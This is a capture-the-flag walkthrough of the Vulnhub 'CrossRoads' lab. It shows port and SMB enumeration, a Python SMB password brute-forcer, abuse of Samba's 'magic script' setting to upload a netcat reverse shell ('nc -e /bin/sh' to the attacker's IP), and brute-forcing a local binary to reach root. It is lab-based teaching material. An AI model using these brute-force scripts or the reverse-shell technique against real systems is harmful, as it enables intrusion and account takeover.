CrossRoads

tags: Vulnhub Easy Linux
Platform: Vulnhub
Difficult: Easy
S.O.: Linux

Enumeration

Nmap

To get started, we run a quick open ports scan.

# nmap -p- -T4 192.168.1.152
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-24 09:45 CET
Nmap scan report for 192.168.1.152
Host is up (0.0027s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 11.95 seconds

Now that we know the open ports, let's scan them in depth.

# nmap -A -Pn -p 80,139,445 192.168.1.152
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-24 09:46 CET
Nmap scan report for 192.168.1.152
Host is up (0.0011s latency).

PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/crossroads.png
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 12 Step Treatment Center | Crossroads Centre Antigua
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (93%), Linux 3.2 - 4.9 (93%), Linux 2.6.32 - 3.10 (93%), Linux 3.4 - 3.10 (92%), Synology DiskStation Manager 5.2-5644 (91%), Netgear RAIDiator 4.2.28 (91%), Linux 3.1 (91%), Linux 3.2 (91%), Linux 2.6.32 - 2.6.35 (91%), Linux 2.6.32 - 3.5 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CROSSROADS

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: CROSSROADS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: crossroads
|   NetBIOS computer name: CROSSROADS\x00
|   Domain name: \x00
|   FQDN: crossroads
|_  System time: 2021-03-24T03:46:54-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-03-24T08:46:54
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT     ADDRESS
1   0.30 ms SupTecnico.mshome.net (172.22.192.1)
2   1.40 ms 192.168.1.152

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.42 seconds

Gobuster

# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.152/ -x php,txt,html,bak
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.152/
[+] Threads:        10
[+] Wordlist:       directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     bak,php,txt,html
[+] Timeout:        10s
===============================================================
2021/03/24 09:32:27 Starting gobuster
===============================================================
/index.html (Status: 200)
/robots.txt (Status: 200)
/note.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2021/03/24 09:39:43 Finished
===============================================================

Ok, inside the web server there is a file called note.txt, let's see it.

# curl http://192.168.1.152/note.txt
just find three kings of blues
then move to the crossroads
-------------------------------
-abuzerkomurcu

And now, let's enumerate the SMB.

SMB

# enum4linux -a 192.168.1.152
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Mar 24 18:08:42 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.1.152
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
..........................................................................
..........................................................................
 ============================ 
|    Users on 192.168.1.152    |
 ============================ 
index: 0x1 RID: 0x3e9 acb: 0x00000010 Account: albert   Name:   Desc: 

user:[albert] rid:[0x3e9]
..........................................................................
..........................................................................
[+] Found domain(s):

    [+] CROSSROADS
    [+] Builtin
..........................................................................
..........................................................................
 ====================================================================== 
|    Users on 192.168.1.152 via RID cycling (RIDS: 500-550,1000-1050)    |
 ====================================================================== 
S-1-5-21-198007098-3908253677-2746664996-501 CROSSROADS\nobody (Local User)
S-1-5-21-198007098-3908253677-2746664996-513 CROSSROADS\None (Domain Group)
S-1-5-21-198007098-3908253677-2746664996-1001 CROSSROADS\albert (Local User)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

Well, among all the information obtained, we have got a user called albert, let's see if we can obtain his password with brute force.

Exploitation

We are going to write a small script to perform brute force.

#! /usr/bin/python

import smb
from smb.base import SharedDevice
from smb.SMBConnection import SMBConnection

host = '192.168.1.152'
user = 'albert'
passList = open('/usr/share/wordlists/rockyou_utf8.txt', 'r').readlines()

for passwd in passList:
    conn = SMBConnection(user, passwd.strip(), 'pycon', host, use_ntlm_v2=True, domain='', sign_options=SMBConnection.SIGN_WHEN_SUPPORTED, is_direct_tcp=True)
    connection = conn.connect(host, 445)
    if connection:
        print("[+]  User Credentials Successful: " + user + ":" + passwd.strip())
        exit(0)
    else:
        print("[-]  Login Failed for: " + user + ":" + passwd.strip())

And let's run it!

# python3 smbbruter.py
[-]  Login Failed for: albert:123456
[-]  Login Failed for: albert:12345
[-]  Login Failed for: albert:123456789
..........................................................................
..........................................................................
[+]  User Credentials Successful: albert:bradley1

Perfect, let's see what shared resources the user has.

# smbclient -L //192.168.1.152 -U albert
Enter WORKGROUP\albert's password: 

    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    smbshare        Disk      
    IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
    albert          Disk      Home Directories
SMB1 disabled -- no workgroup available

And now, we are going to explore the albert share.

# smbclient //192.168.1.152/albert -U albert
Enter WORKGROUP\albert's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Mar  6 13:45:15 2021
  ..                                  D        0  Tue Mar  2 23:00:47 2021
  smbshare                            D        0  Tue Mar  2 23:16:13 2021
  crossroads.png                      N  1583196  Tue Mar  2 23:34:03 2021
  beroot                              N    16664  Wed Mar  3 00:02:41 2021
  user.txt                            N     1805  Sun Jan  3 18:56:19 2021

        4000320 blocks of size 1024. 3759668 blocks available
smb: \> get user.txt
getting file \user.txt of size 1805 as user.txt (97,9 KiloBytes/sec) (average 97,9 KiloBytes/sec)
smb: \> get beroot
getting file \beroot of size 16664 as beroot (428,2 KiloBytes/sec) (average 322,1 KiloBytes/sec)
smb: \> cd smbshare
smb: \smbshare\> ls
  .                                   D        0  Tue Mar  2 23:16:13 2021
  ..                                  D        0  Sat Mar  6 13:45:15 2021
  smb.conf                            N     8779  Tue Mar  2 23:14:54 2021

        4000320 blocks of size 1024. 3759668 blocks available
smb: \smbshare\> get smb.conf
getting file \smbshare\smb.conf of size 8779 as smb.conf (1428,9 KiloBytes/sec) (average 429,2 KiloBytes/sec) 

Get user flag

# cat user.txt
flag 1/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
# cat smb.conf
..........................................................................
..........................................................................
path = /home/albert/smbshare
valid users = albert
browsable = yes
writable = yes
read only = no
magic script = smbscript.sh
guest ok = no

We can see that the magic script parameter has the smbscript.sh script configured so if we see what that parameter does, maybe we should be able to create that script and upload it to SMB along with the smb.conf file to run our script and thus get a reverse shell. Let's try.

We need to create the smbscript.sh with the reverse shell.

# cat smbscript.sh
nc -e /bin/sh 192.168.1.100 8787

And now, upload it to SMB with a terminal listening.

smb: \smbshare\> put smbscript.sh

And... got shell!

# nc -lnvp 8787
listening on [any] 8787 ...
connect to [192.168.1.100] from (UNKNOWN) [192.168.1.152] 35112
id
uid=1000(albert) gid=1000(albert) groups=1000(albert)

Post exploitation

Enumeration

[email protected]:/home/albert$ wget 192.168.1.100/rockyou_utf8.txt
--2021-03-24 13:36:06--  http://192.168.1.100/rockyou_utf8.txt
Connecting to 192.168.1.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 140056880 (134M) [text/plain]
Saving to: ‘rockyou_utf8.txt’

rockyou_utf8.txt                                           100%[=======================================================================================================================================>] 133.57M   150MB/s    in 0.9s    

2021-03-24 13:36:07 (150 MB/s) - ‘rockyou_utf8.txt’ saved [140056880/140056880]

[email protected]:/home/albert$
#!/usr/bin/python

import subprocess

passList = open('rockyou_utf8.txt', 'r').readlines()

for passwd in passList:
        response = subprocess.getoutput('echo "{}" | ./beroot'.format(passwd))
        if 'wrong password!!!' not in response:
                print('Password found: {}'.format(passwd))
                break
if 'wrong password!!!' not in response:
    print("This is the output: \n{}".format(response))
[email protected]:/home/albert$ python3 berootBruter.py
Password found: lemuel

enter password for root
-----------------------

do ls and find root creds

Great! We already have the correct password and now it asks us to do ls to find the credentials. By doing ls we see that there is a new file called rootcreds. Let's see them and authenticate as root.

[email protected]:/home/albert$ ls
beroot  berootBruter.py  crossroads.png  rockyou_utf8.txt  rootcreds  smbshare  user.txt
[email protected]:/home/albert$ cat rootcreds
root
___drifting___
[email protected]:/home/albert# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/home/albert# cd /root
[email protected]:~# ls
beroot.sh  creds  passwd  root.txt
[email protected]:~# cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█

congratulations!

[email protected]:~#

It is entertaining but, it is too CTF style for my liking. Anyway, nice box!